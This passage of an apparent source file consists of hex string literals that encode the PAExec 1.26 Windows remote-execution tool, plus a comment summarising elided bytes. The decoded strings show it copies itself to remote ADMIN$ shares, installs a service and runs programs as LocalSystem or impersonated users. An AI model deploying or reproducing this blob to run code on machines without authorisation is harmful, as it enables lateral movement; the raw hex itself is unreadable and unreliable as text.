'30074006900760065002000730065007300730069006f006e002900000000' \
'005500730069006e0067002000530065007300730069006f006e004900440' \
'02000250075002000660072006f006d00200070006100720061006d007300' \
'0000000053006500540063006200500072006900760069006c00650067006' \
'50000000000000000004600610069006c0065006400200074006f00200073' \
'0065007400200069006e00740065007200610063007400690076006500200' \
'074006f006b0065006e0000004b00650072006e0065006c00330032002e00' \
'64006c006c0000000000575453476574416374697665436f6e736f6c65536' \
'57373696f6e49640000000000000000570054005300470065007400410063' \
'00740069007600650043006f006e0073006f006c006500530065007300730' \
'069006f006e004900640020006e006f007400200073007500700070006f00' \
'720074006500640020006f006e002000740068006900730020004f0053000' \
'0007300650072007600690063006500000064006200670000006c006f0000' \
'0000002d006c006f0020006d0069007300730069006e00670020007600610' \
'06c007500650000002e000000000000005000410045007800650063002000' \
'740069006d006500640020006f00750074002000770061006900740069006' \
'e006700200066006f0072002000610070007000200074006f002000650078' \
'006900740020002d002d0020007400650072006d0069006e0061007400690' \
'06e0067002000610070007000000050004100450078006500630020006500' \
'720072006f0072002000770061006900740069006e006700200066006f007' \
'2002000610070007000200074006f00200065007800690074000000000025' \
'0073002000730074006100720074006500640020007700690074006800200' \
'0700072006f00630065007300730020004900440020002500750000007b00' \
'6c006f00630061006c0020007300650072007600650072007d00000000000' \
'd000a0043006f006e006e0065006300740069006e006700200074006f0020' \
'00250073002e002e002e000000000000005300740061007200740069006e0' \
'0670020005000410045007800650063002000730065007200760069006300' \
'650020006f006e002000250073002e002e002e000000000043006f0070007' \
'90069006e0067002000250073002000720065006d006f00740065006c0079' \
'002e002e002e000000000043006f007000790069006e00670020002500750' \
'02000660069006c00650073002000720065006d006f00740065006c007900' \
'2e002e002e0000000000410044004d0049004e00240000000000490050004' \
'300240000000000000000000d000a00500041004500780065006300200072' \
'0065007400750072006e0069006e006700200065007800690074002000630' \
'06f00640065002000250064000d000a0000007600250075002e0025007500' \
'00000000000000000d000a005000410045007800650063002000250073002' \
'0002d00200045007800650063007500740065002000500072006f00670072' \
'0061006d0073002000520065006d006f00740065006c0079000d000a00430' \
'06f0070007900720069006700680074002000280063002900200032003000' \
'310032002d003200300031003300200050006f00770065007200200041006' \
'4006d0069006e0020004c004c0043000d000a007700770077002e0070006f' \
'00770065007200610064006d0069006e002e0063006f006d002f005000410' \
'045007800650063000d000a0000005400450058005400000000000d0a0000' \
'000000004500720072006f0072002000670065007400740069006e0067002' \
'000660069006c006500200069006e0066006f002000660072006f006d0020' \
'00250073002e00000000005e43202873746f7070696e67290d0a005400690' \
'06d0065006f0075007400200063006f006e006e0065006300740069006e00' \
'6700200074006f002000250073002e002e002e000000d4284200d64e40005' \
'c000000000000002f00610063006300650070007400650075006c00610000' \
'002d00610063006300650070007400650075006c00610000005c005c002a0' \
'000004e006f00200063006f006d0070007500740065007200730020006300' \
'6f0075006c006400200062006500200066006f0075006e00640000000d000' \
'a000000000043006f006d007000750074006500720020006c006900730074' \
'002000660069006c006500200065006d00700074007900000000005c005c0' \
'0000000002c00000043006f006d007000750074006500720020006e006f00' \
'7400200073007000650063006900660069006500640000000000750000007' \
'0000000700040000000000070004000640000006e0000006c000000680000' \
'00730000006500000078000000690000006300000063006e006f006400650' \
'06c0000000000660000007600000077000000640000006c006f0077000000' \
'620065006c006f0077006e006f0072006d0061006c000000610062006f007' \
'60065006e006f0072006d0061006c00000068006900670068000000000072' \
'00650061006c00740069006d006500000000006200610063006b006700720' \
'06f0075006e00640000000000610000006300730072006300000000006300' \
'6c006900730074000000640066007200000072006c006f00000074006f000' \
'00000006e006f006e0061006d006500000000006100630063006500700074' \
'00650075006c0061000000000052006500610063006800650064002000650' \
'06e00640020006f006600200063006f006d006d0061006e00640020006200' \
'650066006f0072006500200073006500650069006e0067002000650078007' \
'0006500630074006500640020007000610072007400730000002500730020' \
'006900730020006e006f0074002000610020007200650063006f0067006e0' \
'069007a006500640020006f007000740069006f006e0000002f003f000000' \
'00002d003f0000000000000000002d0061002000730070006500630069006' \
'600690065006400200077006900740068006f007500740020006e006f006e' \
'002d007a00650072006f002000760061006c0075006500730000000000430' \
'061006e0027007400200075007300650020002d006800200061006e006400' \
'20002d006c00200074006f006700650074006800650072000000000043006' \
'1006e0027007400200075007300650020002d0068002c0020002d0073002c' \
'0020006f00720020002d006c00200074006f0067006500740068006500720' \
'00000000000000000530065007400740069006e00670020002d006e002000' \
'7700680065006e0020006e006f00200063006f006d0070007500740065007' \
'2007300200073007000650063006900660069006500640000000000530065' \
'007400740069006e00670020002d006e00200074006f00200030000000220' \
'00000200000004600610069006c0065006400200074006f00200064006500' \
'6c0065007400650020007000400064002000660069006c00650000002d007' \
'500200077006900740068006f007500740020007500730065007200000050' \
'0061007300730077006f00720064003a00200000000000430061006e00270' \
'07400200075007300650020002d007300200061006e00640020002d006c00' \
'200074006f00670065007400680065007200000000002d007700200077006' \
'900740068006f00750074002000760061006c007500650000000000530070' \
'00650063006900660069006500640020002d0078002000770069007400680' \
'06f007500740020002d00730000002d006300730072006300200077006900' \
'740068006f007500740020002d006300000000002d0063007300720063002' \
'00077006900740068006f00750074002000760061006c007500650000002d' \
'006300730072006300200061006e00640020002d0063006c0069007300740' \
'0200061007200650020006e006f007400200063006f006d00700061007400' \
'690062006c00650000002d0063006c0069007300740020007700690074006' \
'8006f007500740020002d00630000002d0063006c00690073007400200077' \
'006900740068006f00750074002000760061006c0075006500000000002d0' \
'063006c006900730074002000660069006c006500200065006d0070007400' \
'790000002d0063006e006f00640065006c00200077006900740068006f007' \
'500740020002d006300000000002d0072006c006f0020006d006900730073' \
'0069006e0067002000760061006c007500650000000000000000002d00640' \
'0200061006e00640020002d0074006f002000630061006e006e006f007400' \
'20006200650020007500730065006400200074006f0067006500740068006' \
'50072000000000069006e00760061006c006900640020006f00720020006d' \
'0069007300730069006e0067002000760061006c0075006500200066006f0' \
'0720020002d0074006f00000000004e006f0020006100700070006c006900' \
'63006100740069006f006e002000730070006500630069006600690065006' \
'400000000004f006e00650020006f00720020006d006f0072006500200073' \
'006f0075007200630065002000660069006c0065007300200077006500720' \
'0650020006e006f007400200066006f0075006e0064002e00200020005400' \
'7200790020002d00630073007200630020006f00720020002d0063006c006' \
'900730074003f00000000004500720072006f00720020006400750070006c' \
'00690063006100740069006e0067002000610020007500730065007200200' \
'074006f006b0065006e0020002800250053002c0020002500640029000000' \
'5300650044006500620075006700500072006900760069006c00650067006' \
'50000000000000000004e006f0074002000610062006c006500200074006f' \
'00200067006500740020004c006f00630061006c002000530079007300740' \
'065006d00200074006f006b0065006e000000000047006f00740020004c00' \
'6f00630061006c002000530079007300740065006d002000680061006e006' \
'4006c006500000050726f636573732e637070004500720072006f00720020' \
'006c006f006700670069006e006700200069006e002000610073002000250' \
'07300000000005300650052006500730074006f0072006500500072006900' \
'760069006c0065006700650000000000530065004200610063006b0075007' \
'000500072006900760069006c0065006700650000004600610069006c0065' \
'006400200074006f00200069006d0070006500720073006f006e006100740' \
'06500200063006c00690065006e0074002000750073006500720000004900' \
'6d0070006500720073006f006e0061007400650064002000630061006c006' \
'c00650072000000000000004600610069006c0065006400200074006f0020' \
'006f00700065006e002000630075007200720065006e00740020007500730' \
'065007200200074006f006b0065006e000000220025007300220000000000' \
'4600610069006c0065006400200074006f002000500072006500700046006' \
'f00720049006e00740065007200610063007400690076006500500072006f' \
'0063006500730073000000570069006e0053007400610030005c004400650' \
'06600610075006c0074000000770069006e0073007400610030005c005700' \
'69006e006c006f0067006f006e00000000000000000050004100450078006' \
'500630020007300740061007200740069006e0067002000700072006f0063' \
'0065007300730020005b00250073005d0020006100730020004c006f00630' \
'061006c002000530079007300740065006d00000000004800610076006500' \
'2000620061006400200075007300650072002000680061006e0064006c006' \
'500000000005300650049006d0070006500720073006f006e006100740065' \
'00500072006900760069006c00650067006500000000004600610069006c0' \
'065006400200074006f00200069006d0070006500720073006f006e006100' \
'74006500000053006500410073007300690067006e005000720069006d006' \
'1007200790054006f006b0065006e00500072006900760069006c00650067' \
'00650000005300650049006e00630072006500610073006500510075006f0' \
'074006100500072006900760069006c006500670065000000000000000000' \
'50004100450078006500630020007300740061007200740069006e0067002' \
'000700072006f00630065007300730020005b00250073005d002000610073' \
'0020002500730000000000500041004500780065006300200073007400610' \
'07200740069006e0067002000700072006f00630065007300730020005b00' \
'250073005d002000610073002000630075007200720065006e00740020007' \
'500730065007200000000007b006e0075006c006c007d00000000007b0065' \
'006e0076007d0000007b006e006f006e002d006e0075006c006c007d00000' \
'000004c00610075006e0063006800200028006c00610075006e0063006800' \
'47004c0045003d00250075002900200070006100720061006d0073003a002' \
'00070006100740068003d005b00250073005d00200075007300650072003d' \
'005b00250073005d002c002000700045006e0076003d005b00250073005d0' \
'02c0020006400690072003d005b00250073005d002c002000730074006400' \
'69006e003d005b007800250058005d002c0020007300740064006f0075007' \
'4003d005b007800250058005d002c0020007300740064006500720072003d' \
'005b007800250058005d00000053007500630063006500730073006600750' \
'06c006c00790020006c00610075006e006300680065006400000046006100' \
'69006c0065006400200074006f00200073007400610072007400200025007' \
'3002e00000000000000480049004e0054003a002000500041004500780065' \
'0063002000700072006f006200610062006c00790020006e0065006500640' \
'07300200074006f0020006200650020002200520075006e00200041007300' \
'2000410064006d0069006e006900730074007200610074006f00720022000' \
'000000000000000430061006e0027007400200065006e0075006d00500072' \
'006f0063006500730073006500730020002d0020004600610069006c00650' \
'06400200074006f002000670065007400200074006f006b0065006e002000' \
'66006f00720020004c006f00630061006c002000530079007300740065006' \
'd002e00000053002d0031002d0035002d0031003800000000000000000046' \
'00610069006c0065006400200074006f002000670065007400200074006f0' \
'06b0065006e00200066006f00720020004c006f00630061006c0020005300' \
'79007300740065006d002e000000610064007600610070006900330032002' \
'e0064006c006c000000000053616665724372656174654c6576656c000000' \
'005361666572436f6d70757465546f6b656e46726f6d4c6576656c0000536' \
'1666572436c6f73654c6576656c00530061006600650072002e002e002e00' \
'2000630061006c006c00730020006e006f007400200073007500700070006' \
'f00720074006500640020006f006e002000740068006900730020004f0053' \
'0020002d002d002000630061006e002700740020006c0069006d006900740' \
'020007200690067006800740073000000000000004600610069006c006500' \
'6400200074006f0020006c0069006d0069007400200072006900670068007' \
'400730020002800530061006600650072004300720065006100740065004c' \
'006500760065006c0029002e00000000004600610069006c0065006400200' \
'074006f0020006c0069006d00690074002000720069006700680074007300' \
'200028005300610066006500720043006f006d00700075007400650054006' \
'f006b0065006e00460072006f006d004c006500760065006c0029002e0000' \
'0000000000000044006f006e0027007400200068006100760065002000610' \
'0200067006f006f0064002000750073006500720020002d002d0020006300' \
'61006e002700740020006c0069006d0069007400200072006900670068007' \
'4007300000000004600610069006c0065006400200074006f002000670065' \
'007400200065006c00650076006100740065006400200074006f006b00650' \
'06e0000000000430061006e00270074002000710075006500720079002000' \
'74006f006b0065006e00200074006f002000720075006e00200065006c006' \
'5007600610074006500640020002d00200063006f006e00740069006e0075' \
'0069006e006700200061006e00790077006100790000005c005c002500730' \
'05c002500730000004600610069006c0065006400200074006f0020006300' \
'6f006e006e00650063007400200074006f002000250073002e00000000002' \
'e00650078006500000000005c005c00250073005c00410044004d0049004e' \
'0024005c0025007300000000004600610069006c0065006400200074006f0' \
'0200063006c00650061006e007500700020005b00250073005d0020006f00' \
'6e002000250073002e0000004600610069006c0065006400200074006f002' \
'00063006f007000790020005b00250073005d00200074006f0020005b0025' \
'0073005d0020002d002d00200067006f0069006e006700200074006f00200' \
'0740072007900200074006f00200063006f006e00740069006e0075006500' \
'200061006e0079007700610079002e0000005000410045007800650063000' \
'00000005000410045007800650063002d000000250075002d002500730000' \
'007b006c006f00630061006c00200063006f006d007000750074006500720' \
'07d00000000004600610069006c0065006400200074006f00200063006f00' \
'6e006e00650063007400200074006f0020005300650072007600690063006' \
'500200043006f006e00740072006f006c0020004d0061006e006100670065' \
'00720020006f006e002000250073002e0020002000430061006e002700740' \
'0200063006c00650061006e00750070002000500041004500780065006300' \
'2e00000000004600610069006c0065006400200074006f002000730074006' \
'f007000200050004100450078006500630020007300650072007600690063' \
'0065002e00000000004600610069006c0065006400200074006f002000640' \
'065006c006500740065002000500041004500780065006300200073006500' \
'7200760069006300650000004600610069006c0065006400200074006f002' \
'00063006f006e006e00650063007400200074006f00200053006500720076' \
'00690063006500200043006f006e00740072006f006c0020004d0061006e0' \
'0610067006500720020006f006e002000250073002e000000250025005300' \
'79007300740065006d0052006f006f007400250025005c00250073002e006' \
'50078006500000020002d0073006500720076006900630065000000460061' \
'0069006c0065006400200074006f00200069006e007300740061006c006c0' \
'02000730065007200760069006300650020006f006e002000250073000000' \
'4600610069006c0065006400200074006f002000730074006100720074002' \
'000730065007200760069006300650020006f006e0020002500730000002e' \
'657865000000005c005c00250073005c0070006900700065005c002500730' \
'0000000004600610069006c0065006400200074006f0020006f0070006500' \
'6e00200063006f006d006d0075006e00690063006100740069006f006e002' \
'0006300680061006e006e0065006c00200074006f002000250073002e0000' \
'00540069006d006500640020006f007500740020007700610069007400690' \
'06e006700200066006f007200200063006f006d006d0075006e0069006300' \
'6100740069006f006e0020006300680061006e006e0065006c00200074006' \
'f002000250073002e00000000004600610069006c0065006400200074006f' \
'002000730065007400200063006f006d006d0075006e00690063006100740' \
'069006f006e0020006300680061006e006e0065006c00200074006f002000' \
'250073002e00000000004500720072006f007200200063006f006d006d007' \
'5006e00690063006100740069006e00670020007700690074006800200025' \
'0073002e0000000000000000004500720072006f007200200072006500610' \
'0640069006e006700200072006500730070006f006e007300650020006600' \
'72006f006d002000250073002e00000052006500630065006900760065006' \
'400200074006f006f0020006c006900740074006c00650020006400610074' \
'0061002000660072006f006d002000250073002e000000250073002000720' \
'065007400750072006e006500640020002500690000000000000000005200' \
'65006d006f0074006500200061007000700020006600610069006c0065006' \
'400200074006f002000730074006100720074002e00200020005200650074' \
'00750072006e006500640020006500720072006f0072003a000d000a00200' \
'0200025007300000000005c005c00250073005c00410044004d0049004e00' \
'24005c005000410045007800650063005f004d006f0076006500250075002' \
'e0064006100740000005c005000410045007800650063005f004d006f0076' \
'006500250075002e00640061007400000000004600610069006c006500640' \
'0200074006f00200063006f007000790020005b00250073005d0020007400' \
'6f0020005b00250073005d002e00000000004600610069006c00650064002' \
'00074006f0020006f00700065006e00200063006f006d006d002000700069' \
'00700065007300200066006f0072002000250073002e002000000000004e0' \
'06f00740020007500730069006e0067002000720065006400690072006500' \
'6300740065006400200049004f003a00200044006f006e007400570061006' \
'90074003d00250075002c00200049006e0074006500720061006300740069' \
'00760065003d0025007500000000002500730020007200650074007500720' \
'06e0065006400200025006400000000004e006f0074002000770061006900' \
'740069006e006700200066006f007200200025007300200074006f0020006' \
'50078006900740000000000740072007500650000000000660061006c0073' \
'0065000000000000002d002d002d002d002d002d002d002d002d002d002d0' \
'02d002d000d000a0055007300650072003a00200027002500730027002c00' \
'20004c006f00630061006c00530079007300740065006d003a00200025007' \
'3002c00200049006e007400650072006100630074006900760065003a0020' \
'00250073002c002000530065007300730069006f006e003a0020002500690' \
'00000000000000000530065007400740069006e0067007300200069006e00' \
'6400690063006100740065002000660069006c006500730020006d0061007' \
'90020006e00650065006400200074006f00200062006500200063006f0070' \
'0069006500640020002d002d00200063006800650063006b0069006e00670' \
'02e002e002e000000000020002000200020002e002e002e006e0065006500' \
'6400200074006f00200063006f00700079002000660069006c00650073000' \
'00020002000200020002e002e002e006e006f002000660069006c00650073' \
'0020006e00650065006400200074006f00200062006500200063006f00700' \
'0690065006400000053006f0075007200630065002000660069006c006500' \
'200064006f006500730020006e006f0074002000650078006900730074000' \
'00000004600610069006c0065006400200074006f0020006d006f00760065' \
'0020005b00250073005d00200074006f0020005b00250073005d0000004d0' \
'06f00760065006400200025007300200074006f0020002500730000000000' \
'0000000050004100450078006500630020007300650072007600690063006' \
'5002000730074006f007000700069006e006700200028006100730079006e' \
'0063002900000050004100450078006500630020007300650072007600690' \
'0630065002000730074006f007000700069006e0067000000500041004500' \
'7800650063002000720065006300650069007600650064002000720065007' \
'1007500650073007400200074006f002000730074006f0070002c00200062' \
'007500740020007300740069006c006c00200068006100760065002000610' \
'0630074006900760065002000720065007100750065007300740073002e00' \
'20002000570069006c006c002000730074006f00700020006c00610074006' \
'50072002e00000000004500720072006f0072002000720065006100640069' \
'006e006700200072006500710075006500730074002000660072006f006d0' \
'02000700069007000650020002d002d002000730074006f00700070006900' \
'6e00670020007300650072007600690063006500000052006500630065006' \
'900760065006400200074006f006f0020006c006900740074006c00650020' \
'006400610074006100200069006e002000720065007100750065007300740' \
'020002d002d002000730074006f007000700069006e006700200073006500' \
'7200760069006300650000004500720072006f0072002000730065006e006' \
'40069006e0067002000640061007400610020006200610063006b0020002d' \
'002d002000730074006f007000700069006e0067002000730065007200760' \
'06900630065002e0000000000500041004500780065006300200053006500' \
'720076006900630065004d00610069006e002000730074006100720074006' \
'9006e0067002e000000000052006500670069007300740065007200530065' \
'00720076006900630065004300740072006c00480061006e0064006c00650' \
'0720020006600610069006c0065006400200069006e002000500041004500' \
'78006500630000004600610069006c0065006400200074006f00200073006' \
'90067006e0061006c0020005000410045007800650063002000720075006e' \
'006e0069006e0067002e00000000005000410045007800650063002000730' \
'06500720076006900630065002000720075006e006e0069006e0067002e00' \
'00005c005c002e005c0070006900700065005c00250073000000500041004' \
'5007800650063002000630072006500610074006500640020007000690070' \
'0065002000250073002e00000050004100450078006500630020006500780' \
'06900740069006e00670020006c006f006f0070002e000000000050004100' \
'450078006500630020006600610069006c0065006400200074006f0020007' \
'3007400610072007400200053006500720076006900630065004300740072' \
'006c0044006900730070006100740063006800650072002e0000005300650' \
'0720076006900630065007300410063007400690076006500000000006765' \
'6e6572696300756e6b6e6f776e206572726f72000000696f73747265616d0' \
'0000000696f73747265616d2073747265616d206572726f72000000737973' \
'74656d000053005400520049004e004700200054004f004f0020004c004f0' \
'04e0047003a0020002500730000003c006500720072006f00720020002d00' \
'200073007400720069006e006700200074006f006f0020006c006f006e006' \
'70020002d002d002000000000003e0000003c0073007400720069006e0067' \
'00200066006f0072006d00610074002000650078006300650070007400690' \
'06f006e003a0020005b00000028006e0075006c006c002900000000005d00' \
'3e000000000055006e006b006e006f0077006e0020006500720072006f007' \
'2002000760061006c00750065002e00200000000d0000000a00000020005b' \
'004500720072003d00300078002500300058002c002000250075005d00000' \
'000004600610069006c0065006400200074006f0020006f00700065006e00' \
'2000700072006f006300650073007300200074006f00200065006e0061006' \
'2006c0065002000700072006900760069006c006500670065002000250073' \
'00000043006f0075006c00640020006e006f0074002000660069006e00640' \
'02000700072006900760069006c0065006700650020002500730000000000' \
'00004600610069006c0065006400200074006f002000610064006a0075007' \
'3007400200074006f006b0065006e00200066006f00720020007000720069' \
'00760069006c006500670065002000250073000000576f773634446973616' \
'26c65576f77363446735265646972656374696f6e0000576f773634526576' \
'657274576f77363446735265646972656374696f6e0000004400690073006' \
'10062006c0065006400200057004f005700360034002000660069006c0065' \
'002000730079007300740065006d002000720065006400690072006500630' \
'0740069006f006e00000000004600610069006c0065006400200074006f00' \
'2000640069007300610062006c006500200057004f0057003600340020006' \
'60069006c0065002000730079007300740065006d00200072006500640069' \
'00720065006300740069006f006e0000004600610069006c0065006400200' \
'074006f002000660069006e006400200057006f0077003600340044006900' \
'7300610062006c00650057006f00770036003400460073005200650064006' \
'900720065006300740069006f006e00200041005000490000000000000046' \
'00610069006c0065006400200074006f0020007400720061006e0073006c0' \
'061007400650020005500540046002d0038002000660069006c0065002000' \
'25007300200069006e0074006f00200055006e00690063006f00640065002' \
'e0000004600610069006c0065006400200074006f0020006f00700065006e' \
'00200074006500780074002000660069006c0065002000250073002e00000' \
'0000000000000480000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000060634200202a42003c0000005253445398fceeda9ecc634abe' \
'9a3cedd7daad0d01000000443a5c4465762d4769745c50726f6a5c5041457' \
'865635c52656c656173655c5041457865632e70646200000000000000aa00' \
'0000aa00000000000000386042000000000000000000ffffffff000000004' \
'0000000602642000000000000000000010000007026420044264200000000' \
'000000000000000000000000001c6042008c2642000000000000000000020' \
'000009c264200a826420044264200000000001c6042000100000000000000' \
'ffffffff00000000400000008c26420000000000000000000000000054604' \
'200d8264200000000000000000002000000e8264200f42642004426420000' \
'000000546042000100000000000000ffffffff0000000040000000d826420' \
'0000000000000000000000000746042002427420000000000000000000300' \
'00003427420044274200f4264200442642000000000074604200020000000' \
'0000000ffffffff0000000040000000242742000000000000000000000000' \
'0094604200742742000000000000000000030000008427420094274200f42' \
'642004426420000000000946042000200000000000000ffffffff00000000' \
'4000000074274200000000000000000000000000b4604200c427420000000' \
'0000000000001000000d4274200dc27420000000000b46042000000000000' \
'000000ffffffff0000000040000000c427420000000000000000000000000' \
'03860420060264200000000000000000000000000d06d4200202842000000' \
'00000000000002000000302842003c2842004426420000000000d06d42000' \
'100000000000000ffffffff00000000400000002028420060284200000000' \
'00a46e42000000000000000000ffffffff00000000400000007c284200000' \
'00000000000000100000058284200000000000000000000000000a46e4200' \
'7c284200e46e42000000000000000000ffffffff0000000040000000c4284' \
'200a028420000000000000000000000000001000000bc2842000000000000' \
'00000000000000e46e4200c4284200000000000000000001000000a829420' \
'0607042000000000000000000ffffffff0000000040000000e82842000000' \
'0000000000000300000024294200b029420048294200f8284200000000000' \
'0000000000000000000000084704200fc2942008470420001000000000000' \
'00ffffffff0000000040000000fc294200087042000200000000000000fff' \
'fffff0000000040000000cc29420000000000000000000000000060704200' \
'e828420000000000000000000000000008704200cc294200f828420000000' \
'000347042000200000000000000ffffffff00000000400000001429420000' \
'00000000000000030000000c2a42000000000000000000000000003470420' \
'01429420048294200f828420000000000000000000000000002000000f029' \
'42006429420048294200f82842000000000000000000b5f30000e6f30000c' \
'01c01009069010040860100a68a0100d78a0100f28a0100238b0100ae8b01' \
'00d18b0100048c0100578c01007d8c0100ab8c0100d68c0100f18c01001a8' \
'd0100438d0100718d0100948d0100da8d0100678e01009f8e0100ba8e0100' \
'd58e01000c8f0100958f0100fe8f0100d49001000c910100329101008b910' \
'100ae9101000292010097920100b5920100d0920100f39201002793010063' \
'930100e39301009d940100db94010066950100be950100099601009296010' \
'0ca96010023970100539701008e970100dd970100239801006a980100b398' \
'0100de980100019901002c990100679901000000000000000000000000000' \
'00000000000000016bf400000000000302b4200020000003c2b4200582b42' \
'00000000001c60420000000000ffffffff000000000c000000aabe4000000' \
'000003860420000000000ffffffff000000000c000000abf1400000000000' \
'5460420000000000ffffffff000000000c000000e0be40000000000021bf4' \
'00000000000a02b420003000000b02b4200742b4200582b42000000000074' \
'60420000000000ffffffff000000000c000000c5be40000000000021bf400' \
'000000000dc2b420003000000ec2b4200742b4200582b4200000000009460' \
'420000000000ffffffff000000000c000000fbbe4000feffffff00000000d' \
'4ffffff00000000feffffff000000004ec9400000000000feffffff000000' \
'00d4ffffff00000000feffffff00000000cccb400000000000feffffff000' \
'00000ccffffff00000000feffffff00000000afcc40000000000000000000' \
'79cc4000feffffff00000000d4ffffff00000000feffffff00000000a1cd4' \
'00000000000feffffff00000000d4ffffff00000000feffffffeed5400002' \
'd6400000000000feffffff00000000d4ffffff00000000feffffff0000000' \
'0c7d7400000000000feffffff00000000d4ffffff00000000feffffff0000' \
'00009ad9400000000000feffffff00000000d4ffffff00000000feffffff0' \
'0000000e8e0400000000000feffffff00000000d4ffffff00000000feffff' \
'ff45e4400059e4400000000000feffffff00000000ccffffff00000000fef' \
'fffff58e940006ce9400000000000feffffff00000000d4ffffff00000000' \
'feffffff0000000094f8400000000000feffffff00000000d4ffffff00000' \
'000feffffff0000000092fb400000000000feffffff00000000d4ffffff00' \
'000000feffffff000000003dff400000000000feffffff00000000d0fffff' \
'f00000000feffffff00000000be00410000000000feffffff00000000d8ff' \
'ffff00000000feffffff0000000063044100feffffff000000006f044100f' \
'effffff00000000d8ffffff00000000feffffff00000000d3054100feffff' \
'ff00000000e2054100feffffff00000000d8ffffff00000000feffffff000' \
'00000750b410000000000feffffff000000007cffffff00000000feffffff' \
'00000000fa20410000000000feffffff00000000d0ffffff00000000fefff' \
'fff000000009421410000000000feffffff00000000d8ffffff00000000fe' \
'ffffff00000000c622410000000000feffffff00000000c4ffffff0000000' \
'0feffffff00000000c126410000000000feffffff00000000ccffffff0000' \
'0000feffffff00000000a927410000000000feffffff00000000d0ffffff0' \
'0000000feffffff000000008328410000000000feffffff00000000d8ffff' \
'ff00000000feffffff445b4100485b410000000000feffffff00000000d8f' \
'fffff00000000feffffff105b4100145b410000000000feffffff00000000' \
'd0ffffff00000000feffffff00000000a5674100000000006a67410074674' \
'100feffffff00000000b0ffffff00000000feffffff000000009b5d410000' \
'000000e75c4100f15c4100feffffff00000000d8ffffff00000000fefffff' \
'f096541000d65410000000000feffffff00000000d8ffffff00000000feff' \
'ffffdc5b4100e55b4100400000000000000000000000485e4100ffffffff0' \
'0000000ffffffff0000000000000000000000000100000001000000cc2f42' \
'002205931902000000dc2f420001000000ec2f42000000000000000000000' \
'000000100000000000000feffffff00000000d4ffffff00000000feffffff' \
'876641008b66410000000000225c410000000000543042000200000060304' \
'200582b420000000000d06d420000000000ffffffff000000000c00000007' \
'5c410000000000feffffff00000000d8ffffff00000000feffffff5978410' \
'06c78410000000000feffffff00000000d4ffffff00000000feffffff0000' \
'00009679410000000000feffffff00000000bcffffff00000000feffffff0' \
'0000000b97b410000000000feffffff00000000d8ffffff00000000feffff' \
'ff00000000b87c410000000000feffffff00000000c8ffffff00000000fef' \
'fffff00000000a07e410000000000feffffff00000000d0ffffff00000000' \
'feffffff000000000a88410000000000c46e420000000000ffffffff00000' \
'0000400000000000000010000003c31420000000000000000000000000058' \
'31420022059319040000009431420001000000b4314200000000000000000' \
'00000000001000000ffffffff0000000000000000c18a410001000000cf8a' \
'4100ffffffff0000000000000000020000000300000001000000c83142004' \
'000000000000000000000004f1b40002205931902000000fc314200010000' \
'000c32420000000000000000000000000001000000ffffffff00000000fff' \
'fffff00000000000000000000000001000000010000002032420040000000' \
'00000000000000007e1940002205931901000000543242000000000000000' \
'00000000000000000000000000001000000ffffffffc98b41000000000022' \
'0593190e00000088324200000000000000000000000000000000000000000' \
'00100000000000000ffffffff3e8b410000000000968b4100010000009e8b' \
'410001000000a68b410000000000468b4100040000004e8b4100040000005' \
'68b4100000000005e8b4100070000007e8b410008000000868b4100080000' \
'008e8b410007000000668b41000b0000006e8b41000b000000768b4100220' \
'59319020000001c3342000000000000000000000000000000000000000000' \
'01000000ffffffff0d8b410000000000188b4100220593190400000050334' \
'200020000007033420000000000000000000000000001000000ffffffff00' \
'000000ffffffff00000000010000000000000001000000000000000200000' \
'0020000000300000001000000983342000000000000000000030000000100' \
'0000a83342004000000000000000000000004831400040000000000000000' \
'0000000c93040002205931903000000dc3342000000000000000000000000' \
'00000000000000000001000000ffffffffec8b410000000000f48b4100010' \
'00000fc8b4100220593190100000018344200000000000000000000000000' \
'000000000000000001000000ffffffff728c4100220593190700000044344' \
'200000000000000000000000000000000000000000001000000ffffffff1f' \
'8c410000000000278c4100000000002f8c410000000000378c41000000000' \
'03f8c410000000000478c4100000000004f8c41002205931902000000a034' \
'4200000000000000000000000000000000000000000001000000ffffffffc' \
'68c4100ffffffffce8c41002205931902000000d434420000000000000000' \
'0000000000000000000000000001000000ffffffff8f8e4100ffffffff978' \
'e410022059319020000000835420000000000000000000000000000000000' \
'0000000001000000fffffffff08e4100fffffffffe8e41002205931902000' \
'0003c354200000000000000000000000000000000000000000001000000ff' \
'ffffff5e8d410000000000668d41002205931902000000703542000100000' \
'08035420000000000000000000000000001000000ffffffff00000000ffff' \
'ffff000000000000000000000000010000000100000094354200400000000' \
'000000000000000bb4840002205931903000000c835420001000000e03542' \
'0000000000000000000000000001000000ffffffff00000000000000000c8' \
'd4100ffffffff0000000000000000010000000200000001000000f4354200' \
'400000000000000000000000ea47400022059319020000002836420001000' \
'0003836420000000000000000000000000001000000ffffffff00000000ff' \
'ffffff00000000000000000000000001000000010000004c3642004000000' \
'0000000000000000038464000220593190100000080364200000000000000' \
'000000000000000000000000000001000000ffffffff358d4100220593190' \
'2000000ac36420001000000bc364200000000000000000000000000010000' \
'00ffffffff00000000ffffffff00000000000000000000000001000000010' \
'00000d0364200400000000000000000000000324540002205931905000000' \
'04374200000000000000000000000000000000000000000001000000fffff' \
'fff028e4100000000000d8e410001000000188e4100010000003a8e410001' \
'000000458e410022059319010000005037420000000000000000000000000' \
'0000000000000000001000000ffffffff8c8d410022059319030000007c37' \
'4200000000000000000000000000000000000000000001000000ffffffffb' \
'98d410000000000c48d410000000000cf8d410000000000220593190a0000' \
'00c0374200000000000000000000000000000000000000000001000000000' \
'00000ffffffff278f410000000000328f4100010000003d8f410001000000' \
'488f410001000000538f4100040000005e8f410004000000698f410004000' \
'000748f4100040000007f8f4100010000008a8f4100220593190200000034' \
'384200000000000000000000000000000000000000000001000000fffffff' \
'ffc904100ffffffff0491410000000000220593190b000000703842000000' \
'0000000000000000000000000000000000000100000000000000ffffffffb' \
'68f4100ffffffffbe8f410001000000c68f4100ffffffffc68f4100030000' \
# [binary payload elided: roughly 1,000 lines of hex-encoded string
#  continuations forming an embedded PAExec Windows (PE) executable.
#  Recoverable details from the decoded bytes: import tables referencing
#  VERSION.dll, NETAPI32.dll, USERENV.dll, PSAPI.DLL, WTSAPI32.dll, MPR.dll,
#  ADVAPI32.dll, and KERNEL32.dll; a VS_VERSION_INFO resource identifying
#  "PAExec Application", version 1.26.0.0, Power Admin LLC, copyright
#  2012-2015, original filename PAExec.exe; the program's full command-line
#  usage/help text ("PAExec is a freely-redistributable re-implementation of
#  SysInternal/Microsoft's popular PsExec program ..."), including its
#  documented exit codes (-1 through -11); and an XML application manifest
#  requesting requestedExecutionLevel level='asInvoker'.]
